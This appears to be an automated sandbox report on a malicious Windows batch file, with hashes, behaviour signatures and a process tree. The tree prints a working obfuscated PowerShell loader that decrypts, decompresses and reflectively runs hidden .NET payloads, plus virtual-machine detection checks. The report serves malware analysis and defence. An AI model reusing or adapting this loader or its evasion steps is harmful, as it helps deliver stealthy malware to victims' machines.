Analysis

  • max time kernel
    117s
  • max time network
    119s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    16-12-2024 00:45

General

  • Target

    skibiditoilet.bat

  • Size

    7.4MB

  • MD5

    e67e3a94d89425d40496ddf35898d535

  • SHA1

    0797b9358d62864867ce3253a02a20456ac735b1

  • SHA256

    8d7786fb33c1d05816fdc8c938273b452e94a4234358b45e567cc31ceaf262ad

  • SHA512

    6b7c2115556e45e4584a6eb2cc8a68585b8ac25806135406057aa44c41aa9ae6a10fdaf4abdba2e2d94df526f90ed243a86664f82de044fb2603025d8965e13d

  • SSDEEP

    49152:SckmM2hvv+vfCedsWawQhCU2p3byz6fH6DdztsVuY/FEXx3bSwbhK0XD2KiVmZbV:V

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2100
    • C:\Windows\system32\fsutil.exe
      fsutil fsinfo drives
      2⤵
        PID:2952
      • C:\Windows\system32\findstr.exe
        findstr /i /c:"QEMU HARDDISK" /c:"DADY HARDDISK" /c:"WDS100T2B0A"
        2⤵
          PID:3036
        • C:\Windows\system32\fsutil.exe
          fsutil fsinfo drives
          2⤵
            PID:3048
          • C:\Windows\system32\findstr.exe
            findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
            2⤵
              PID:3052
            • C:\Windows\system32\cmd.exe
              cmd.exe /c echo function bGHD($RkCl){ Invoke-Expression -Debug -WarningAction Inquire -Verbose '$FfCT=[gySgyygystgyegymgy.gySgyegycugyrgyigytgyygy.gyCrgyygypgytgyogyggyragyphgyygy.Agyegys]gy::gyCgyrgyegyagytgye(gy)gy;'.Replace('gy', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$FfCT.MAHoAHdAHe=AH[AHSAHyAHsAHtAHemAH.AHSAHeAHcAHuAHriAHtAHyAH.AHCAHrAHypAHtoAHgAHraAHpAHhyAH.CAHiAHpAHhAHeAHrAHMoAHdAHeAH]AH::AHCBAHC;'.Replace('AH', ''); Invoke-Expression -InformationAction Ignore -WarningAction Inquire '$FfCT.PFEaFEdFEdiFEnFEgFE=FE[FESFEysFEtFEeFEmFE.FESFEecFEuFErFEiFEtFEyFE.CFEryFEpFEtoFEgFEraFEphFEyFE.FEPFEaFEdFEdiFEnFEgFEMFEodFEe]FE::FEPFEKFECFESFE7;'.Replace('FE', ''); Invoke-Expression -Debug '$FfCT.Kideidyid=[idSidyidsidtideidm.idCidoidnidvideidrtid]id:id:idFidridomidBaidside6id4idStidriidnidgid("rid7idsidg9idSid+id3id6idhidDsidsidlid9idDidLidaBidJidbidPidvidHidG4idWtidpidEsidjid+Cidg4id7idsidIidwidtidhUid=id");'.Replace('id', ''); Invoke-Expression -InformationAction Ignore -Debug -Verbose '$FfCT.IkDVkD=kD[SkDykDskDtkDekDmkD.CkDokDnkDvkDekDrkDt]kD:kD:kDFkDrkDokDmBkDaskDekD64kDSkDtrkDinkDgkD("+kD9kDfkDeMkDfkD2kDMkDPkDwkDtgkDTkDrkD7kD7kDlkDMKkD9kDgkDQkD=kD=");'.Replace('kD', ''); $UBuD=$FfCT.CreateDecryptor(); $NTSS=$UBuD.TransformFinalBlock($RkCl, 0, $RkCl.Length); $UBuD.Dispose(); $FfCT.Dispose(); $NTSS;}function bxuq($RkCl){ Invoke-Expression -WarningAction Inquire -Debug '$HOEL=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm(,$RkCl);'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$KAKm=NIdeIdwId-OIdbIdjIdeIdcIdtId SIdyIdsIdtIdeIdmId.IIdOId.IdMIdeIdmIdorIdySIdtIdreIdaIdm;'.Replace('Id', ''); Invoke-Expression -InformationAction Ignore '$tAxt=NwEewEwwE-OwEbwEjwEewEcwEtwE SwEywEswEtwEewEmwE.IwEOwE.wECwEowEmwEprwEeswEswEiowEnwE.GwEZiwEpwESwEtwErwEewEamwE($HOEL, [wEIwEOwE.CwEowEmwEpwErwEewEsswEiwEowEnwE.wECwEomwEpwErwEewEswEswEiowEnMwEowEdewE]wE::wEDewEcwEowEmwEpwErwEeswEswE);'.Replace('wE', ''); $tAxt.CopyTo($KAKm); $tAxt.Dispose(); $HOEL.Dispose(); $KAKm.Dispose(); $KAKm.ToArray();}function LAnn($RkCl,$LRjf){ Invoke-Expression -Debug -WarningAction Inquire '$QPns=[DzSDzyDzstDzeDzmDz.DzRDzeDzflDzeDzcDztDziDzoDzn.DzADzsDzsDzeDzmDzblDzy]Dz:Dz:LDzoDzadDz([byte[]]$RkCl);'.Replace('Dz', ''); Invoke-Expression -Debug '$IQgG=$QPns.EUqnUqtUqryUqPUqoUqiUqnUqt;'.Replace('Uq', ''); Invoke-Expression -Debug -Verbose -WarningAction Inquire '$IQgG.SeISenSevoSekSeeSe(Se$SenSeulSelSe, $LRjf);'.Replace('Se', '');}$RtKw = 'C:\Users\Admin\AppData\Local\Temp\skibiditoilet.bat';$host.UI.RawUI.WindowTitle = $RtKw;$kLna=[System.IO.File]::ReadAllText($RtKw).Split([Environment]::NewLine);foreach ($jDdi in $kLna) { if ($jDdi.StartsWith('cKvGI')) { $haun=$jDdi.Substring(5); break; }}$dtxP=[string[]]$haun.Split('\');Invoke-Expression -InformationAction Ignore -Debug -Verbose -WarningAction Inquire '$PHM = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[0].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -Verbose -Debug -WarningAction Inquire -InformationAction Ignore '$cOZ = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[1].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$MKb = bxuq (bGHD ([anCanoannvaneanrantan]an:an:FanranoanmanBanaansean6an4anSantanraninang($dtxP[2].Replace("#", "/").Replace("@", "A"))));'.Replace('an', '');LAnn $PHM $null;LAnn $cOZ $null;LAnn $MKb (,[string[]] (''));
              2⤵
                PID:540
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -WindowStyle Hidden
                2⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2228

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/2228-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

              Filesize

              4KB

            • memory/2228-5-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

              Filesize

              2.9MB

            • memory/2228-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

              Filesize

              32KB

            • memory/2228-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

              Filesize

              9.6MB

            • memory/2228-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

              Filesize

              9.6MB

            • memory/2228-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

              Filesize

              9.6MB